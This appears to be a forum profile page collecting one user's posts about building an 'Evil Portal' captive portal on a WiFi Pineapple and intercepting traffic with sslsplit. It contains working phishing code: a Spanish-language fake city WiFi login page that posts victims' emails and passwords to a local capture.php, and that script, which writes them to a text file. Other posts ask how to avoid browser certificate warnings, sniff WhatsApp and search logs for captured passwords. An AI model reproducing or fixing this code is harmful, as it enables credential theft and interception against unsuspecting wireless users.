Jump to content

daniboy92

Active Members
  • Posts

    192
  • Joined

  • Last visited

Posts posted by daniboy92

  1. I'm a little more near from my goal...

    With your modifications i get a email and created the file perfectly!!

    The only thing i need it's to make this html send the password fields and register in the same txt.... Because the password information it's not sending... I don't know why.

    So... there is something wrong in the part of sending password information.

  2. Thanks man. Now this two are fixing... And what about this script?

    <script type="text/javascript">

    function ajaxRequest() {
    if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
    } else if (window.ActiveXObject) {
    return new ActiveXObject("Microsoft.XMLHTTP");
    } else {
    return false;
    }
    }
    function sendInfo() {
    var xmlhttp = new ajaxRequest();
    var emailvalue=encodeURIComponent(document.getElementById("email").value);
    var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
    if (emailvalue != null && emailvalue != "") {
    var parameters="email="+emailvalue+"&redirect="+redirectvalue;
    xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.send(parameters);
    document.getElementById("results").innerHTML="&iexclGracias!";
    window.location = document.getElementById("redirect").value;
    } else {
    document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
    }
    }
    function sendInfo2() {
    var xmlhttp = new ajaxRequest();
    var passwordvalue=encodeURIComponent(document.getElementById("password").value);
    var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
    if (passwordvalue != null && passwordvalue != "") {
    var parameters="password="+passwordvalue+"&redirect="+redirectvalue;
    xmlhttp.open("POST", "http://172.16.42.1/capture", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.send(parameters);
    document.getElementById("results").innerHTML="&iexclGracias!";
    window.location = document.getElementById("redirect").value;
    } else {
    document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
    }
    }
    </script>
    I don't know if i am sending and collecting fine the information from that two fields "email" "password.
    This is how my web looks:
    AduEgSW.jpg
  3. Hi,

    I have problems with a html web. I want a html for summit a loggin information with Evil Portal infusion. Now this html can redirect normally but it doesn't save email and password. I think i'm missing something in this code because i don't have many knowledge about html programming... This is my html code:

    <html>

    <head>
    <title>$gatewayname Entry</title>
    <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
    <script type="text/javascript">
    function ajaxRequest() {
    if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
    } else if (window.ActiveXObject) {
    return new ActiveXObject("Microsoft.XMLHTTP");
    } else {
    return false;
    }
    }
    function sendInfo() {
    var xmlhttp = new ajaxRequest();
    var emailvalue=encodeURIComponent(document.getElementById("email").value);
    var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
    if (emailvalue != null && emailvalue != "") {
    var parameters="email="+emailvalue+"&redirect="+redirectvalue;
    xmlhttp.open("POST", "http://172.16.42.1:80/capture.php", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.send(parameters);
    document.getElementById("results").innerHTML="&iexclGracias!";
    window.location = document.getElementById("redirect").value;
    } else {
    document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
    }
    }
    function sendInfo2() {
    var xmlhttp = new ajaxRequest();
    var passwordvalue=encodeURIComponent(document.getElementById("password").value);
    var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
    if (passwordvalue != null && passwordvalue != "") {
    var parameters="password="+passwordvalue+"&redirect="+redirectvalue;
    xmlhttp.open("POST", "http://172.16.42.1:80/capture", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.send(parameters);
    document.getElementById("results").innerHTML="&iexclGracias!";
    window.location = document.getElementById("redirect").value;
    } else {
    document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
    }
    }
    </script>
    </head>
    <body>
    <center>
    <h2>$gatewayname</h2>
    <font size="1"><i>Ofrecido para usted por la Ciudad de Madrid</i></font>
    <br />
    <br />
    <p><font size="2">Para hacer uso del servicio necesita suscribirse con un email y una contrase&ntildea.</font></p>
    <div id="results"></div>
    <form id="emailform" method="POST" action="http://172.16.42.1:80/capture.php">
    <table>
    <tr>
    <td><label>Email</label></td>
    <td><input type="text" id="email" name="email" placeholder="Ingrese su email" required />
    <td><label>Contrase&ntildea</label></td>
    <td><input type="text" id="password" name="password" placeholder="Ingrese su contraseña" required />
    </tr>
    </table>
    <input type="hidden" id="redirect" name="redirect" value="$authtarget" />
    <button type="button" onclick="sendInfo();return false;">Ingresar</button>
    </form>
    <p><font size="1"><i>Su informaci&oacuten no será compartida con terceras partes.</i></font></p>
    <p><font size="1"><i>Conectándose y haciendo uso de esta red está aceptando los <a href="#">términos del servicio.</a></i></p>
    <img src="images/wifi.png" width="71" height="49" border="0">
    </center>
    <iframe style="display:none;" src="get"></iframe>
    </body>
    </html>
    this is my capture.php:

    <?php

    $email = $_POST['email'];
    $password = $_POST['password'];
    $redirect = $_POST['redirect'];
    $file = fopen("evilportalpass.txt", "a");
    fwrite($file, $email . " " . $password . "\n");
    fclose($file);
    echo 'Gracias por elegir $gatewayname <meta http-equiv="refresh" content="2; url=' . $redirect . '" />';
    ?>
    The location for this file is in /www folder. I don't know if its's a code problem or just a location problem from my capture.php.
    Hope someone can help me.
  4. You are submitting your form to no where...
    <form action="capture" method="post">
    

    The value of action should be the place that you are posting to. Capture is nothing.

    It should look like:

    <form action="http://172.16.42.1/capture.php" method="post">
    
    

    Thanks newbi3. 'Capture' it's an url in the same folder of my splash.html, it's aiming to capture.php in my SD.

  5. Unfortunately these logs are very hard to explore. When I was browsing 10 minutes, many lines with ininteligible characters appears and a few appears readable...

    Sslsplit it's more recently than sslstrip, but like the other it seems than the actual browsers detects it and doesn't let the victim navigate more...

    Also, I can't see what's the utility with WhatsApp, that have a command line in configuration of this infusion. Maybe we need more tests. I am very newbie with this infusion, but it seems uneffective with new and upgrade browsers.

    Sorry for bad English.

  6. Hello everyone,

    I was playing with sslsplit, trying to get some passwords with my phone as a victim. I have two little problems...

    1) How to generate a valid ssl cert to avoid Browser's warning...

    2) How can i sniff my whatsapp? I've read that sslsplit can do something with Whatsapp, but i was trying and nothing happends.

    Sorry if i am doing stupids questions.

    Thanks for advance.

    One more thing...

    3) Webs doesn't show properly, it only shows words, but not images,

  7. Just go to "History" into Sslsplit infusion and select "View" or "Download" and search carefully for an email and pass... If you don't find anything just nothing put or use their email and pass, maybe people only navigate without a login.

    And thesugarat is rigth, but we can't control what people do with their own Pineapples.

×
×
  • Create New...